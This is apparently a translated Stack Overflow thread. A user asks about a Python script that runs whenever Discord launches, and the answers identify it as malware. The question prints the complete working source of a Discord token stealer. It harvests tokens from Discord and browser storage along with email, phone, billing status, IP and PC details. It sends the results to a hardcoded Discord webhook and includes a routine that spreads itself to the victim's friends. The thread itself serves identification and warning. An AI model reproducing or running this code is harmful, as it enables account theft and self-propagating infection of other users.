logo标签列表

Discord恶意软件

pythondiscordmalware
10

有人向我反映了关于Discord的问题。下面的代码在问题开始时被注意到。Windows会询问应该使用哪个程序运行下面的代码,默认为Discord。每次运行Discord时,都会运行这段代码:

import os
if os.name != "nt":
    exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv

LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")

PATHS = {

    "Discord"           : ROAMING + "\\Discord",

    "Discord Canary"    : ROAMING + "\\discordcanary",

    "Discord PTB"       : ROAMING + "\\discordptb",

    "Google Chrome"     : LOCAL + "\\Google\\Chrome\\User Data\\Default",

    "Opera"             : ROAMING + "\\Opera Software\\Opera Stable",

    "Brave"             : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",

    "Yandex"            : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"

}

def getheaders(token=None, content_type="application/json"):

    headers = {

        "Content-Type": content_type,

        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"

    }

    if token:

        headers.update({"Authorization": token})

    return headers

def getuserdata(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())

    except:

        pass

def gettokens(path):

    path += "\\Local Storage\\leveldb"

    tokens = []

    for file_name in os.listdir(path):

        if not file_name.endswith(".log") and not file_name.endswith(".ldb"):

            continue

        for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:

            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):

                for token in findall(regex, line):

                    tokens.append(token)

    return tokens

def getdeveloper():

    dev = "wodx"

    try:

        dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()

    except:

        pass

    return dev

def getip():

    ip = "None"

    try:

        ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()

    except:

        pass

    return ip

def getavatar(uid, aid):

    url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"

    try:

        urlopen(Request(url))

    except:

        url = url[:-4]

    return url

def gethwid():

    p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)

    return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]

def getfriends(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())

    except:

        pass

def getchat(token, uid):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]

    except:

        pass

def has_payment_methods(token):

    try:

        return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)

    except:

        pass

def send_message(token, chat_id, form_data):

    try:

        urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()

    except:

        pass

def spread(token, form_data, delay):

    return # Remove to re-enabled

    for friend in getfriends(token):

        try:

            chat_id = getchat(token, friend["id"])

            send_message(token, chat_id, form_data)

        except Exception as e:

            pass

        sleep(delay)

def main():

    cache_path = ROAMING + "\\.cache~$"

    prevent_spam = True

    self_spread = True

    embeds = []

    working = []

    checked = []

    already_cached_tokens = []

    working_ids = []

    ip = getip()

    pc_username = os.getenv("UserName")

    pc_name = os.getenv("COMPUTERNAME")

    user_path_name = os.getenv("userprofile").split("\\")[2]

    developer = getdeveloper()

    for platform, path in PATHS.items():

        if not os.path.exists(path):

            continue

        for token in gettokens(path):

            if token in checked:

                continue

            checked.append(token)

            uid = None

            if not token.startswith("mfa."):

                try:

                    uid = b64decode(token.split(".")[0].encode()).decode()

                except:

                    pass

                if not uid or uid in working_ids:

                    continue

            user_data = getuserdata(token)

            if not user_data:

                continue

            working_ids.append(uid)

            working.append(token)

            username = user_data["username"] + "#" + str(user_data["discriminator"])

            user_id = user_data["id"]

            avatar_id = user_data["avatar"]

            avatar_url = getavatar(user_id, avatar_id)

            email = user_data.get("email")

            phone = user_data.get("phone")

            nitro = bool(user_data.get("premium_type"))

            billing = bool(has_payment_methods(token))

            embed = {

                "color": 0x0eec59,

                "fields": [

                    {

                        "name": "**Account Info**",

                        "value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',

                        "inline": True

                    },

                    {

                        "name": "**PC Info**",

                        "value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',

                        "inline": True

                    },

                    {

                        "name": "**Token**",

                        "value": token,

                        "inline": False

                    }

                ],

                "author": {

                    "name": f"{username} ({user_id})",

                    "icon_url": avatar_url

                },

                "footer": {

                    "text": f"Token grabber by THC4L"

                }

            }

            embeds.append(embed)

    with open(cache_path, "a") as file:

        for token in checked:

            if not token in already_cached_tokens:

                file.write(token + "\n")

    if len(working) == 0:

        working.append('123')

    webhook = {

        "content": "",

        "embeds": embeds,

        "username": "THC4L",

        "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"

    }

    try:

        urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders()))

    except:

        pass

    if self_spread:

        for token in working:

            with open(argv[0], encoding="utf-8") as file:

                content = file.read()

            payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'

            Thread(target=spread, args=(token, payload, 7500 / 1000)).start()

try:

    main()

except Exception as e:

    print(e)

    pass

任何想法这可能是什么?我可以看到:for token in gettokens(path):"text": f"Token grabber by THC4L"。它几乎看起来像是一个Discord令牌窃取器。它似乎获取电话号码、用户名、帐户信息、PC信息等...

编辑:

这是恶意软件。这是Discord桌面应用程序的令牌记录器。它还在您的浏览器中查找其他与Discord相关的信息。

这里对它进行了更深入的审查:

https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be

这位编写脚本的人在他提供的Pastebin链接中提供了一些非常有见地的信息,我建议您去查看一下: https://pastebin.com/0q0Fk0Ej enter image description here

它特别试图获取以下内容:

  • 公共IP地址
  • Discord令牌
  • Discord好友
  • Discord好友的ID
  • Dicord用户名
  • Discord用户ID
  • Discord电子邮件
  • Discord氮气(检查您是否拥有)
  • 电话号码
  • 计费信息
  • PC用户名
  • PC名称
  • PC平台

因为已经删除了YouTube账户,推广该脚本:

https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

创建者的Github账户:

https://github.com/ecriminal

不确定为什么它被发布为问题。你已经回答了自己的问题。 - Gray Programmerz
这原本是一个问题,但我更新了它以包含答案。这样人们可以快速浏览或滚动页面获取答案。 - love2phish
意图是好的,但那是不系统的方式。正确的方式是,你应该发布另一个答案,而不是将问题和答案合并在一起。这样,没有人会像我一样感到困惑。 - Gray Programmerz
是的,抱歉。我会记住这个,以便在未来的帖子中避免类似情况 :) - love2phish
2个回答
11

这是恶意软件,不仅记录了令牌,还窃取了Chrome、Brave、Opera和Yandex的密码。立即卸载它并更改所有密码。

作者的YouTube频道: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

更新:事实证明,它还会窃取您的IP地址,耶!

14
其实,它不会窃取浏览器密码,只是在这些浏览器中寻找你的Discord令牌。而IP地址并不重要,我真的不知道为什么人们会担心IP地址泄露的问题。 - Tiebe Groosman
4
真正的问题是,如果知识产权不重要,为什么他们要窃取你的知识产权? - Gandalf The Grey
2
IP地址确实很重要,可以用来查找地理位置。现在这取决于用户是否关心。 - Gray Programmerz
虽然脚本中没有包含任何自启动功能,但最好检查您的系统是否存在任何现有的自启动功能。您应该卸载该应用程序并检查任何相关的脚本。 - Kartikey
3

这确实是恶意软件,但不是 makerio 所说的那种。它只尝试发送您的 Discord 令牌,并在 Discord 或浏览器中查找该令牌。您必须删除此病毒并更改您的 Discord 密码。通过查看代码,还发现他们已启用将病毒发送给 Discord 好友的选项,因此您应尝试删除任何包含此病毒的消息,并澄清这不是您所为。

网页内容由stack overflow 提供, 点击上面的
可以查看英文原文,
原文链接